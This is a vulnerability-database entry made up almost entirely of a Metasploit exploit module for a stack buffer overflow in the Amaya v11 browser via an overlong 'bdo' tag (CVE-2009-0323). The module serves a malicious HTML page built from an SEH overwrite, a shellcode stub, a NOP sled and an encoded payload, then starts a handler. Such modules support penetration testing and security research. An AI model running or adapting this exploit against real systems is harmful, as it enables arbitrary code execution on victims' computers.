Amaya Browser v11.0 'bdo' Tag Overflow

2009-10-10T21:51:25
ID MSF:EXPLOIT/WINDOWS/BROWSER/AMAYA_BDO
Type metasploit
Reporter Rapid7
Modified 2017-07-24T13:26:21

Description

This module exploits a stack buffer overflow in the Amaya v11 Browser. By sending an overly long string to the "bdo" tag, an attacker may be able to execute arbitrary code.

                                        
                                            ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => "Amaya Browser v11.0 'bdo' Tag Overflow",
      'Description'    => %q{
          This module exploits a stack buffer overflow in the Amaya v11 Browser.
          By sending an overly long string to the "bdo"
          tag, an attacker may be able to execute arbitrary code.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'dookie, original exploit by Rob Carter' ],
      'References'     =>
        [
          [ 'CVE', '2009-0323' ],
          [ 'OSVDB', '55721' ],
          [ 'BID', '33046' ],
          [ 'BID', '33047' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'Space'         => 970,
          'BadChars'      => "\x00",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Amaya Browser v11',     { 'Offset' => 6889, 'Ret' => 0x02101034 } ], # wxmsw28u_core_vc_custom.dll
        ],
      'DisclosureDate' => 'Jan 28 2009',
      'DefaultTarget'  => 0))
  end


  def on_request_uri(cli, request)
    # Re-generate the payload
    return if ((p = regenerate_payload(cli)) == nil)

    # Set the exploit buffer
    sploit = "<bdo dir=\""
    sploit += rand_text_alpha(6889)
    sploit += "\x74\x06\x41\x41"
    sploit += [target.ret].pack('V')
    sploit += "\x68\x7f\x01\x01\x7f"   # push 7F01017F
    sploit += "\x58"		   # pop EAX
    sploit += "\x2d\x18\x69\x45\x7d"   # sub EAX, 7A7A0857
    sploit += "\x50"		   # push EAX
    sploit += "\xc3"		   # RETN
    sploit += make_nops(100)
    sploit += payload.encoded
    sploit += make_nops(970 - payload.encoded.length)
    sploit += "\">pwned!</bdo>"

    print_status("Sending #{self.name}")

    # Transmit the response to the client
    send_response_html(cli, sploit)

    # Handle the payload
    handler(cli)
  end
end